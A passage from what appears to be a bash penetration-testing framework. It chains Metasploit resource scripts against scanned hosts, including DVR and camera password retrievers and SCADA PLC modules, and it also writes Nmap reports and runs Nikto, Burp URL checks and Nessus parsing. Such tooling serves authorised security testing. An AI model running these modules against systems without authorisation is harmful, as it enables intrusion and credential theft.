if [[ -e $name/5900.txt ]]; then
echo " VNC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5900.txt|g" /tmp/resource/5900-vnc.rc
cat /tmp/resource/5900-vnc.rc >> /tmp/master
fi
if [[ -e $name/5920.txt ]]; then
echo " CCTV DVR"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5920.txt|g" /tmp/resource/5920-cctv.rc
cat /tmp/resource/5920-cctv.rc >> /tmp/master
fi
if [[ -e $name/5984.txt ]]; then
echo " CouchDB"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5984.txt|g" /tmp/resource/5984-couchdb.rc
cat /tmp/resource/5984-couchdb.rc >> /tmp/master
fi
if [[ -e $name/5985.txt ]]; then
echo " winrm"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/5985.txt|g" /tmp/resource/5985-winrm.rc
cat /tmp/resource/5985-winrm.rc >> /tmp/master
fi
if [[ -e $name/x11.txt ]]; then
echo " x11"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/x11.txt|g" /tmp/resource/6000-5-x11.rc
cat /tmp/resource/6000-5-x11.rc >> /tmp/master
fi
if [[ -e $name/6379.txt ]]; then
echo " Redis"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/6379.txt|g" /tmp/resource/6379-redis.rc
cat /tmp/resource/6379-redis.rc >> /tmp/master
fi
if [[ -e $name/7777.txt ]]; then
echo " Backdoor"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/7777.txt|g" /tmp/resource/7777-backdoor.rc
cat /tmp/resource/7777-backdoor.rc >> /tmp/master
fi
if [[ -e $name/8000.txt ]]; then
echo " Canon"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/8000.txt|g" /tmp/resource/8000-canon.rc
cat /tmp/resource/8000-canon.rc >> /tmp/master
fi
if [[ -e $name/8080.txt ]]; then
echo " Tomcat"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/8080.txt|g" /tmp/resource/8080-tomcat.rc
cat /tmp/resource/8080-tomcat.rc >> /tmp/master
fi
if [[ -e $name/8080.txt ]]; then
echo " Oracle"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/8080.txt|g" /tmp/resource/8080-oracle.rc
cat /tmp/resource/8080-oracle.rc >> /tmp/master
fi
if [[ -e $name/8222.txt ]]; then
echo " VMware"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/8222.txt|g" /tmp/resource/8222-vmware.rc
cat /tmp/resource/8222-vmware.rc >> /tmp/master
fi
if [[ -e $name/8400.txt ]]; then
echo " Adobe"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/8400.txt|g" /tmp/resource/8400-adobe.rc
cat /tmp/resource/8400-adobe.rc >> /tmp/master
fi
if [[ -e $name/8834.txt ]]; then
echo " Nessus"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/8834.txt|g" /tmp/resource/8834-nessus.rc
cat /tmp/resource/8834-nessus.rc >> /tmp/master
fi
if [[ -e $name/9000.txt ]]; then
echo " Sharp DVR Password Retriever"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/9000.txt|g" /tmp/resource/9000-sharp.rc
cat /tmp/resource/9000-sharp.rc >> /tmp/master
fi
if [[ -e $name/9084.txt ]]; then
echo " VMware"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/9084.txt|g" /tmp/resource/9084-vmware.rc
cat /tmp/resource/9084-vmware.rc >> /tmp/master
fi
if [[ -e $name/9100.txt ]]; then
echo " Printers"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/9100.txt|g" /tmp/resource/9100-printers.rc
cat /tmp/resource/9100-printers.rc >> /tmp/master
fi
if [[ -e $name/9999.txt ]]; then
echo " Telnet"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/9999.txt|g" /tmp/resource/9999-telnet.rc
cat /tmp/resource/9999-telnet.rc >> /tmp/master
fi
if [[ -e $name/13364.txt ]]; then
echo " Rosewill RXS-3211 IP Camera Password Retriever"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/13364.txt|g" /tmp/resource/13364-rosewill.rc
cat /tmp/resource/13364-rosewill.rc >> /tmp/master
fi
if [[ -e $name/17185.txt ]]; then
echo " VxWorks"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/17185.txt|g" /tmp/resource/17185-udp-vxworks.rc
cat /tmp/resource/17185-udp-vxworks.rc >> /tmp/master
fi
if [[ -e $name/28784.txt ]]; then
echo " SCADA Koyo DirectLogic PLC"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/28784.txt|g" /tmp/resource/28784-scada.rc
cat /tmp/resource/28784-scada.rc >> /tmp/master
fi
if [[ -e $name/30718.txt ]]; then
echo " Telnet"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/30718.txt|g" /tmp/resource/30718-telnet.rc
cat /tmp/resource/30718-telnet.rc >> /tmp/master
fi
if [[ -e $name/37777.txt ]]; then
echo " Dahua DVR"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/37777.txt|g" /tmp/resource/37777-dahua-dvr.rc
cat /tmp/resource/37777-dahua-dvr.rc >> /tmp/master
fi
if [[ -e $name/46824.txt ]]; then
echo " SCADA Sielco Sistemi"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/46824.txt|g" /tmp/resource/46824-scada.rc
cat /tmp/resource/46824-scada.rc >> /tmp/master
fi
if [[ -e $name/50000.txt ]]; then
echo " db2"
sed -i "s|setg RHOSTS.*|setg RHOSTS file:$name\/50000.txt|g" /tmp/resource/50000-db2.rc
cat /tmp/resource/50000-db2.rc >> /tmp/master
fi
echo db_export -f xml -a $name/metasploit.xml >> /tmp/master
echo exit >> /tmp/master
x=$(wc -l /tmp/master | cut -d ' ' -f1)
if [ $x -eq 3 ]; then
echo 2>/dev/null
else
echo
sed 's/\/\//\//g' /tmp/master > $name/master.rc
msfdb init
msfconsole -r $name/master.rc
cat tmpmsf | egrep -iv "(> exit|> run|% complete|Attempting to extract|Authorization not requested|Checking if file|completed|Connecting to the server|Connection reset by peer|data_connect failed|db_export|did not reply|does not appear|doesn't exist|Finished export|Handshake failed|ineffective|It doesn't seem|Login Fail|negotiation failed|NoMethodError|No relay detected|no response|No users found|not be identified|not found|NOT VULNERABLE|Providing some time|request timeout|responded with error|RPORT|RHOSTS|Scanning for vulnerable|Shutting down the TFTP|Spooling|Starting export|Starting TFTP server|Starting VNC login|THREADS|Timed out after|timed out|Trying to acquire|Unable to|unknown state)" > $name/metasploit.txt
rm $name/master.rc
rm tmpmsf
fi
}
##############################################################################################################
f_enumerate(){
clear
f_banner
f_typeofscan
echo -n "Enter the location of your previous scan: "
read -e location
# Check for no answer
if [[ -z $location ]]; then
f_error
fi
# Check for wrong answer
if [ ! -d $location ]; then
f_error
fi
name=$location
echo
echo -n "Set scan delay. (0-5, enter for normal) "
read delay
# Check for no answer
if [[ -z $delay ]]; then
delay='0'
fi
if [ $delay -lt 0 ] || [ $delay -gt 5 ]; then
f_error
fi
f_scripts
echo
echo $medium
f_run-metasploit
echo
echo -e "${BLUE}Stopping Postgres.${NC}"
service postgresql stop
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The supporting data folder is located at ${YELLOW}$name${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_report(){
END=$(date +%r\ %Z)
filename=$name/report.txt
host=$(wc -l $name/hosts.txt | cut -d ' ' -f1)
echo "Nmap Report" > $filename
date +%A" - "%B" "%d", "%Y >> $filename
echo >> $filename
echo "Start time $START" >> $filename
echo "Finish time $END" >> $filename
echo "Scanner IP $ip" >> $filename
echo >> $filename
echo $medium >> $filename
echo >> $filename
if [ -e $name/script-smbvulns.txt ]; then
echo "May be vulnerable to MS08-067 & more." >> $filename
echo >> $filename
cat $name/script-smbvulns.txt >> $filename
echo >> $filename
echo $medium >> $filename
echo >> $filename
fi
echo "Hosts Discovered ($host)" >> $filename
echo >> $filename
cat $name/hosts.txt >> $filename 2>/dev/null
echo >> $filename
if [[ ! -s $name/ports.txt ]]; then
rm -rf "$name" tmp*
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "${YELLOW}No hosts found with open ports.${NC}"
echo
echo
exit
else
ports=$(wc -l $name/ports.txt | cut -d ' ' -f1)
fi
echo $medium >> $filename
echo >> $filename
echo "Open Ports ($ports)" >> $filename
echo >> $filename
if [ -s $name/ports-tcp.txt ]; then
echo "TCP Ports" >> $filename
cat $name/ports-tcp.txt >> $filename
echo >> $filename
fi
if [ -s $name/ports-udp.txt ]; then
echo "UDP Ports" >> $filename
cat $name/ports-udp.txt >> $filename
echo >> $filename
fi
echo $medium >> $filename
if [ -e $name/banners.txt ]; then
banners=$(wc -l $name/banners.txt | cut -d ' ' -f1)
echo >> $filename
echo "Banners ($banners)" >> $filename
echo >> $filename
cat $name/banners.txt >> $filename
echo >> $filename
echo $medium >> $filename
fi
echo >> $filename
echo "High Value Hosts by Port" >> $filename
echo >> $filename
HVPORTS="13 19 21 22 23 25 37 53 67 69 70 79 80 102 110 111 119 123 135 137 139 143 161 389 407 433 443 445 465 500 502 512 513 514 523 524 548 554 563 587 623 631 636 771 831 873 902 993 995 998 1050 1080 1099 1158 1344 1352 1433 1434 1521 1604 1720 1723 1883 1900 1911 1962 2049 2202 2302 2362 2375 2628 2947 3000 3031 3050 3260 3306 3310 3389 3478 3500 3632 3671 4369 4800 5019 5040 5060 5353 5432 5560 5631 5632 5666 5672 5683 5850 5900 5920 5984 5985 6000 6001 6002 6003 6004 6005 6379 6481 6666 7210 7634 7777 8000 8009 8080 8081 8091 8140 8222 8332 8333 8400 8443 8834 9000 9084 9100 9160 9600 9999 10000 11211 12000 12345 13364 17185 19150 27017 28784 30718 31337 35871 37777 44818 46824 47808 49152 50000 50030 50060 50070 50075 50090 60010 60030"
for i in $HVPORTS; do
if [[ -e $name/$i.txt ]]; then
echo "Port $i" >> $filename
cat $name/$i.txt >> $filename
echo >> $filename
fi
done
echo $medium >> $filename
echo >> $filename
cat $name/nmap.txt >> $filename
echo $medium >> $filename
echo $medium >> $filename
echo >> $filename
echo "Nmap Scripts" >> $filename
SCRIPTS="script-13 script-21 script-22 script-23 script-smtp script-37 script-53 script-67 script-70 script-79 script-102 script-110 script-111 script-nntp script-123 script-137 script-139 script-143 script-161 script-389 script-443 script-445 script-500 script-523 script-524 script-548 script-554 script-623 script-631 script-636 script-873 script-993 script-995 script-1050 script-1080 script-1099 script-1344 script-1352 script-1433 script-1434 script-1521 script-1604 script-1723 script-1883 script-1911 script-1962 script-2049 script-2202 script-2302 script-2375 script-2628 script-2947 script-3031 script-3260 script-3306 script-3310 script-3389 script-3478 script-3632 script-3671 script-4369 script-5019 script-5060 script-5353 script-5666 script-5672 script-5683 script-5850 script-5900 script-5984 script-x11 script-6379 script-6481 script-6666 script-7210 script-7634 script-8000 script-8009 script-8081 script-8091 script-8140 script-bitcoin script-9100 script-9160 script-9600 script-9999 script-10000 script-11211 script-12000 script-12345 script-17185 script-19150 script-27017 script-31337 script-35871 script-44818 script-47808 script-49152 script-50000 script-hadoop script-apache-hbase"
for i in $SCRIPTS; do
if [[ -e $name/"$i.txt" ]]; then
cat $name/"$i.txt" >> $filename
echo $medium >> $filename
fi
done
if [ -e $name/script-enum4linux.txt ] || [ -e $name/script-smbclient.txt ] || [ -e $name/ike-scan.txt ]; then
echo $medium >> $filename
echo >> $filename
echo "Additional Enumeration" >> $filename
if [ -e $name/script-enum4linux.txt ]; then
cat $name/script-enum4linux.txt >> $filename
echo $medium >> $filename
echo >> $filename
fi
if [ -e $name/script-smbclient.txt ]; then
cat $name/script-smbclient.txt >> $filename
echo $medium >> $filename
fi
if [ -e $name/script-ike-scan.txt ]; then
cat $name/script-ike-scan.txt >> $filename
echo $medium >> $filename
fi
fi
mv $name $home/data/
START=0
END=0
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/$name/report.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_directObjectRef(){
clear
f_banner
echo -e "${BLUE}Using Burp, authenticate to a site, map & Spider, then log out.${NC}"
echo -e "${BLUE}Target > Site map > select the URL > right click > Copy URLs in this host.${NC}"
echo -e "${BLUE}Paste the results into a new file.${NC}"
f_location
for i in $(cat $location); do
curl -sk -w "%{http_code} - %{url_effective} \\n" "$i" -o /dev/null 2>&1 | tee -a tmp
done
cat tmp | sort -u > DirectObjectRef.txt
mv DirectObjectRef.txt $home/data/DirectObjectRef.txt
rm tmp
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/DirectObjectRef.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_multitabs(){
f_runlocally
clear
f_banner
echo -e "${BLUE}Open multiple tabs in $browser with:${NC}"
echo
echo "1. List"
echo "2. Directories from a domain's robot.txt."
echo "3. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) f_location
echo -n "Use SSL? (y/N) "
read ssl
$web &
sleep 2
if [ -z $ssl ]; then
for i in $(cat $location); do
$web http://$i &
sleep 1
done
elif [ "$ssl" == "y" ]; then
for i in $(cat $location); do
$web https://$i &
sleep 1
done
else
f_error
fi
;;
2)
echo
echo $medium
echo
echo "Usage: target.com or target-IP"
echo
echo -n "Domain: "
read domain
# Check for no answer
if [[ -z $domain ]]; then
f_error
fi
# Check for OS X
if [[ `uname` == 'Darwin' ]]; then
/usr/local/bin/wget -q $domain/robots.txt
else
wget -q $domain/robots.txt
fi
# Check if the file is empty
if [ ! -s robots.txt ]; then
echo
echo -e "${RED}$medium${NC}"
echo
echo -e "${RED} *** No robots file discovered. ***${NC}"
echo
echo -e "${RED}$medium${NC}"
sleep 2
f_main
fi
grep 'Disallow' robots.txt | awk '{print $2}' > tmp
$web &
sleep 2
for i in $(cat tmp); do
$web http://$domain$i &
sleep 1
done
rm robots.txt
mv tmp $home/data/$domain-robots.txt
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/$domain-robots.txt${NC}\n"
echo
echo
exit
;;
3) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_nikto(){
f_runlocally
clear
f_banner
echo -e "${BLUE}Run multiple instances of Nikto in parallel.${NC}"
echo
echo "1. List of IPs."
echo "2. List of IP:port."
echo "3. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1)
f_location
echo
echo -n "Port (default 80): "
read port
echo
# Check if port is a number
echo "$port" | grep -E "^[0-9]+$" 2>/dev/null
isnum=$?
if [ $isnum -ne 0 ] && [ ${#port} -gt 0 ]; then
f_error
fi
if [ ${#port} -eq 0 ]; then
port=80
fi
if [ $port -lt 1 ] || [ $port -gt 65535 ]; then
f_error
fi
mkdir $home/data/nikto-$port
while read -r line; do
xdotool key ctrl+shift+t
xdotool type "nikto -h $line -port $port -Format htm --output $home/data/nikto-$port/$line.htm ; exit"
sleep 1
xdotool key Return
done < "$location"
;;
2)
f_location
mkdir $home/data/nikto
while IFS=: read -r host port; do
xdotool key ctrl+shift+t
sleep 1
xdotool type "nikto -h $host -port $port -Format htm --output $home/data/nikto/$host-$port.htm ; exit"
sleep 1
xdotool key Return
done < "$location"
;;
3) f_main;;
*) f_error;;
esac
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new report is located at ${YELLOW}$home/data/nikto/${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_parse(){
clear
f_banner
echo -e "${BLUE}Parse XML to CSV.${NC}"
echo
echo "1. Burp (Base64)"
echo "2. Nessus (.nessus)"
echo "3. Nexpose (XML 2.0)"
echo "4. Nmap"
echo "5. Qualys"
echo "6. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1)
f_location
parsers/parse-burp.py $location
mv burp.csv $home/data/burp-`date +%H:%M:%S`.csv
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/burp-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
2)
f_location
parsers/parse-nessus.py $location
# Delete findings with a solution of n/a
grep -v 'n/a' nessus.csv > tmp.csv
# Delete findings with CVSS score of 0 and solution of n/a
egrep -v "(Adobe Acrobat Detection|Adobe Extension Manager Installed|Adobe Flash Player for Mac Installed|Adobe Flash Professional Detection|Adobe Illustrator Detection|Adobe Photoshop Detection|Adobe Reader Detection|Adobe Reader Installed \(Mac OS X\)|ADSI Settings|Advanced Message Queuing Protocol Detection|AJP Connector Detection|AirWatch API Settings|Antivirus Software Check|Apache Axis2 Detection|Apache HTTP Server HttpOnly Cookie Information Disclosure|Apple Filing Protocol Server Detection|Apple Profile Manager API Settings|AppSocket & socketAPI Printers - Do Not Scan|Appweb HTTP Server Version|ASG-Sentry SNMP Agent Detection|Authenticated Check: OS Name and Installed Package Enumeration|Autodesk AutoCAD Detection|Backported Security Patch Detection \(FTP\)|Backported Security Patch Detection \(SSH\)|Authenticated Check: OS Name and Installed Package Enumeration|Backported Security Patch Detection \(WWW\)|BACnet Protocol Detection|BIOS Version Information \(via SMB\)|BIOS Version \(WMI\)|Blackboard Learn Detection|Broken Web Servers|CA Message Queuing Service Detection|CDE Subprocess Control Service \(dtspcd\) Detection|Check Point FireWall-1 ICA Service Detection|Check Point SecuRemote Hostname Information Disclosure|Cisco AnyConnect Secure Mobility Client Detection|CISCO ASA SSL VPN Detection|Cisco TelePresence Multipoint Control Unit Detection|Cleartext protocols settings|COM+ Internet Services (CIS) Server Detection|Common Platform Enumeration \(CPE\)|Computer Manufacturer Information \(WMI\)|CORBA IIOP Listener Detection|Database settings|DB2 Administration Server Detection|DB2 Discovery Service Detection|DCE Services Enumeration|Dell OpenManage Web Server Detection|Derby Network Server Detection|Detect RPC over TCP|Device Hostname|Device Type|DNS Sender Policy Framework \(SPF\) Enabled|DNS Server DNSSEC Aware Resolver|DNS Server Fingerprinting|DNS Server Version Detection|Do not scan fragile devices|EMC SMARTS Application Server Detection|Erlang Port Mapper Daemon Detection|Ethernet Card Manufacturer Detection|External URLs|FileZilla Client Installed|firefox Installed \(Mac OS X\)|Firewall Rule Enumeration|Flash Player Detection|FTP Service AUTH TLS Command Support|FTP Server Detection|Global variable settings|Good MDM Settings|Google Chrome Detection \(Windows\)|Google Chrome Installed \(Mac OS X\)|Google Picasa Detection \(Windows\)|Host Fully Qualified Domain Name \(FQDN\) Resolution|HMAP Web Server Fingerprinting|Hosts File Whitelisted Entries|HP Data Protector Components Version Detection|HP OpenView BBC Service Detection|HP SiteScope Detection|HSTS Missing From HTTPS Server|HTTP cookies import|HTTP Cookie 'secure' Property Transport Mismatch|HTTP login page|HTTP Methods Allowed \(per directory\)|HTTP Proxy Open Relay Detection|HTTP Reverse Proxy Detection|HTTP Server Cookies Set|HTTP Server Type and Version|HTTP TRACE \/ TRACK Methods Allowed|HTTP X-Frame-Options Response Header Usage|Hyper-V Virtual Machine Detection|HyperText Transfer Protocol \(HTTP\) Information|IBM Domino Detection \(uncredentialed check\)|IBM Domino Installed|IBM GSKit Installed|IBM iSeries Credentials|IBM Lotus Notes Detection|IBM Notes Client Detection|IBM Remote Supervisor Adapter Detection \(HTTP\)|IBM Tivoli Endpoint Manager Client Detection|IBM Tivoli Endpoint Manager Web Server Detection|IBM Tivoli Storage Manager Client Installed|IBM Tivoli Storage Manager Service Detection|IBM WebSphere Application Server Detection|IMAP Service Banner Retrieval|IMAP Service STARTTLS Command Support|IP Protocols Scan|IPMI Cipher Suites Supported|IPMI Versions Supported|iTunes Version Detection \(credentialed check\)|Kerberos configuration|Kerberos Information Disclosure|L2TP Network Server Detection|LDAP Server Detection|LDAP Crafted Search Request Server Information Disclosure|LDAP Service STARTTLS Command Support|LibreOffice Detection|Login configurations|Lotus Sametime Detection|MacOSX Cisco AnyConnect Secure Mobility Client Detection|McAfee Common Management Agent Detection|McAfee Common Management Agent Installation Detection|McAfee ePolicy Orchestrator Application Server Detection|MediaWiki Detection|Microsoft Exchange Installed|Microsoft Internet Explorer Enhanced Security Configuration Detection|Microsoft Internet Explorer Version Detection|Microsoft Lync Server Installed|Microsoft Malicious Software Removal Tool Installed|Microsoft .NET Framework Detection|Microsoft .NET Handlers Enumeration|Microsoft Office Detection|Microsoft OneNote Detection|Microsoft Patch Bulletin Feasibility Check|Microsoft Revoked Digital Certificates Enumeration|Microsoft Silverlight Detection|Microsoft Silverlight Installed \(Mac OS X\)|Microsoft SQL Server STARTTLS Support|Microsoft SMS\/SCCM Installed|Microsoft System Center Configuration Manager Client Installed|Microsoft System Center Operations Manager Component Installed|Microsoft Update Installed|Microsoft Windows AutoRuns Boot Execute|Microsoft Windows AutoRuns Codecs|Microsoft Windows AutoRuns Explorer|Microsoft Windows AutoRuns Internet Explorer|Microsoft Windows AutoRuns Known DLLs|Microsoft Windows AutoRuns Logon|Microsoft Windows AutoRuns LSA Providers|Microsoft Windows AutoRuns Network Providers|Microsoft Windows AutoRuns Print Monitor|Microsoft Windows AutoRuns Registry Hijack Possible Locations|Microsoft Windows AutoRuns Report|Microsoft Windows AutoRuns Scheduled Tasks|Microsoft Windows AutoRuns Services and Drivers|Microsoft Windows AutoRuns Unique Entries|Microsoft Windows AutoRuns Winlogon|Microsoft Windows AutoRuns Winsock Provider|Microsoft Windows 'CWDIllegalInDllSearch' Registry Setting|Microsoft Windows Installed Hotfixes|Microsoft Windows NTLMSSP Authentication Request Remote Network Name Disclosure|Microsoft Windows Process Module Information|Microsoft Windows Process Unique Process Name|Microsoft Windows Remote Listeners Enumeration \(WMI\)|Microsoft Windows SMB : Obtains the Password Policy|Microsoft Windows SMB LanMan Pipe Server Listing Disclosure|Microsoft Windows SMB Log In Possible|Microsoft Windows SMB LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration|Microsoft Windows SMB NativeLanManager Remote System Information Disclosure|Microsoft Windows SMB Registry : Enumerate the list of SNMP communities|Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry|Microsoft Windows SMB Registry : OS Version and Processor Architecture|Microsoft Windows SMB Registry : Remote PDC\/BDC Detection|Microsoft Windows SMB Versions Supported|Microsoft Windows SMB Registry : Vista \/ Server 2008 Service Pack Detection|Microsoft Windows SMB Registry : XP Service Pack Detection|Microsoft Windows SMB Registry Remotely Accessible|Microsoft Windows SMB Registry : Win 7 \/ Server 2008 R2 Service Pack Detection|Microsoft Windows SMB Registry : Windows 2000 Service Pack Detection|Microsoft Windows SMB Registry : Windows 2003 Server Service Pack Detection|Microsoft Windows SMB Service Detection|Microsoft Windows Update Installed|MobileIron API Settings|MSRPC Service Detection|Modem Enumeration \(WMI\)|MongoDB Settings|Mozilla Foundation Application Detection|MySQL Server Detection|Nessus Internal: Put cgibin in the KB|Nessus Scan Information|Nessus SNMP Scanner|NetBIOS Multiple IP Address Enumeration|Netstat Active Connections|Netstat Connection Information|netstat portscanner \(SSH\)|Netstat Portscanner \(WMI\)|Network Interfaces Enumeration \(WMI\)|Network Time Protocol \(NTP\) Server Detection|Nmap \(XML file importer\)|Non-compliant Strict Transport Security (STS)|OpenSSL Detection|OpenSSL Version Detection|Oracle Application Express \(Apex\) Detection|Oracle Application Express \(Apex\) Version Detection|Oracle Java Runtime Environment \(JRE\) Detection \(Unix\)|Oracle Java Runtime Environment \(JRE\) Detection|Oracle Installed Software Enumeration \(Windows\)|Oracle Settings|OS Identification|Palo Alto Networks PAN-OS Settings|Patch Management: Dell KACE K1000 Settings|Patch Management: IBM Tivoli Endpoint Manager Server Settings|Patch Management: Patch Schedule From Red Hat Satellite Server|Patch Management: Red Hat Satellite Server Get Installed Packages|Patch Management: Red Hat Satellite Server Get Managed Servers|Patch Management: Red Hat Satellite Server Get System Information|Patch Management: Red Hat Satellite Server Settings|Patch Management: SCCM Server Settings|Patch Management: Symantec Altiris Settings|Patch Management: VMware Go Server Settings|Patch Management: WSUS Server Settings|PCI DSS compliance : options settings|PHP Version|Ping the remote host|POP3 Service STLS Command Support|Port scanner dependency|Port scanners settings|Post-Scan Rules Application|Post-Scan Status|Protected Web Page Detection|RADIUS Server Detection|RDP Screenshot|RealPlayer Detection|Record Route|Remote listeners enumeration \(Linux \/ AIX\)|Remote web server screenshot|Reputation of Windows Executables: Known Process\(es\)|Reputation of Windows Executables: Unknown Process\(es\)|RHEV Settings|RIP Detection|RMI Registry Detection|RPC portmapper \(TCP\)|RPC portmapper Service Detection|RPC Services Enumeration|Salesforce.com Settings|Samba Server Detection|SAP Dynamic Information and Action Gateway Detection|SAProuter Detection|Service Detection \(GET request\)|Service Detection \(HELP Request\)|slident \/ fake identd Detection|Service Detection \(2nd Pass\)|Service Detection: 3 ASCII Digit Code Responses|SMB : Disable the C$ and ADMIN$ shares after the scan (WMI)|SMB : Enable the C$ and ADMIN$ shares during the scan \(WMI\)|SMB Registry : Start the Registry Service during the scan|SMB Registry : Start the Registry Service during the scan \(WMI\)|SMB Registry : Starting the Registry Service during the scan failed|SMB Registry : Stop the Registry Service after the scan|SMB Registry : Stop the Registry Service after the scan \(WMI\)|SMB Registry : Stopping the Registry Service after the scan failed|SMB QuickFixEngineering \(QFE\) Enumeration|SMB Scope|SMTP Server Connection Check|SMTP Service STARTTLS Command Support|SMTP settings|smtpscan SMTP Fingerprinting|Snagit Installed|SNMP settings|SNMP Supported Protocols Detection|SNMPc Management Server Detection|SOCKS Server Detection|SolarWinds TFTP Server Installed|Spybot Search & Destroy Detection|SquirrelMail Detection|SSH Algorithms and Languages Supported|SSH Protocol Versions Supported|SSH Server Type and Version Information|SSH settings|SSL \/ TLS Versions Supported|SSL Certificate Information|SSL Cipher Block Chaining Cipher Suites Supported|SSL Cipher Suites Supported|SSL Compression Methods Supported|SSL Perfect Forward Secrecy Cipher Suites Supported|SSL Resume With Different Cipher Issue|SSL Service Requests Client Certificate|SSL Session Resume Supported|SSL\/TLS Service Requires Client Certificate|Strict Transport Security \(STS\) Detection|Subversion Client/Server Detection \(Windows\)|Symantec Backup Exec Server \/ System Recovery Installed|Symantec Encryption Desktop Installed|Symantec Endpoint Protection Manager Installed \(credentialed check\)|Symantec Veritas Enterprise Administrator Service \(vxsvc\) Detection|TCP\/IP Timestamps Supported|TeamViewer Version Detection|Tenable Appliance Check \(deprecated\)|Terminal Services Use SSL\/TLS|Thunderbird Installed \(Mac OS X\)|Time of Last System Startup|TLS Next Protocols Supported|TLS NPN Supported Protocol Enumeration|Traceroute Information|Unknown Service Detection: Banner Retrieval|UPnP Client Detection|VERITAS Backup Agent Detection|VERITAS NetBackup Agent Detection|Viscosity VPN Client Detection \(Mac OS X\)|VMware vCenter Detect|VMware vCenter Orchestrator Installed|VMware ESX\/GSX Server detection|VMware SOAP API Settings|VMware vCenter SOAP API Settings|VMware Virtual Machine Detection|VMware vSphere Client Installed|VMware vSphere Detect|VNC Server Security Type Detection|VNC Server Unencrypted Communication Detection|vsftpd Detection|Wake-on-LAN|Web Application Firewall Detection|Web Application Tests Settings|Web mirroring|Web Server Directory Enumeration|Web Server Harvested Email Addresses|Web Server HTTP Header Internal IP Disclosure|Web Server Load Balancer Detection|Web Server No 404 Error Code Check|Web Server robots.txt Information Disclosure|Web Server UDDI Detection|Window Process Information|Window Process Module Information|Window Process Unique Process Name|Windows Compliance Checks|Windows ComputerSystemProduct Enumeration \(WMI\)|Windows Display Driver Enumeration|Windows DNS Server Enumeration|Windows Management Instrumentation \(WMI\) Available|Windows NetBIOS \/ SMB Remote Host Information Disclosure|Windows Prefetch Folder|Windows Product Key Retrieval|WinSCP Installed|Wireless Access Point Detection|Wireshark \/ Ethereal Detection \(Windows\)|WinZip Installed|WMI Anti-spyware Enumeration|WMI Antivirus Enumeration|WMI Bluetooth Network Adapter Enumeration|WMI Encryptable Volume Enumeration|WMI Firewall Enumeration|WMI QuickFixEngineering \(QFE\) Enumeration|WMI Server Feature Enumeration|WMI Trusted Platform Module Enumeration|Yosemite Backup Service Driver Detection|ZENworks Remote Management Agent Detection)" nessus.csv > tmp.csv
# Delete additional findings with CVSS score of 0
egrep -v "(Acronis Agent Detection \(TCP\)|Acronis Agent Detection \(UDP\)|Additional DNS Hostnames|Adobe AIR Detection|Adobe Reader Enabled in Browser \(Internet Explorer\)|Adobe Reader Enabled in Browser \(Mozilla firefox\)|Alert Standard Format \/ Remote Management and Control Protocol Detection|Amazon Web Services Settings|Apache Banner Linux Distribution Disclosure|Apache Tomcat Default Error Page Version Detection|Apple TV Detection|Apple TV Version Detection|Authentication Failure - Local Checks Not Run|CA ARCServe UniversalAgent Detection|CA BrightStor ARCserve Backup Discovery Service Detection|Citrix Licensing Service Detection|Citrix Server Detection|COM+ Internet Services \(CIS\) Server Detection|Crystal Reports Central Management Server Detection|Data Execution Prevention \(DEP\) is Disabled|Daytime Service Detection|DB2 Connection Port Detection|Discard Service Detection|DNS Server BIND version Directive Remote Version Disclosure|DNS Server Detection|DNS Server hostname.bind Map Hostname Disclosure|Do not scan Novell NetWare|Do not scan printers|Do not scan printers \(AppSocket\)|Dropbox Installed \(Mac OS X\)|Dropbox Software Detection \(uncredentialed check\)|Enumerate IPv4 Interfaces via SSH|Echo Service Detection|EMC Replication Manager Client Detection|Enumerate IPv6 Interfaces via SSH|Enumerate MAC Addresses via SSH|Exclude top-level domain wildcard hosts|H323 Protocol \/ VoIP Application Detection|Host Authentication Failure\(s\) for Provided Credentials|HP LoadRunner Agent Service Detection|HP Integrated Lights-Out \(iLO\) Detection|IBM Tivoli Storage Manager Client Acceptor Daemon Detection|IBM WebSphere MQ Listener Detection|ICMP Timestamp Request Remote Date Disclosure|Identd Service Detection|Inconsistent Hostname and IP Address|Ingres Communications Server 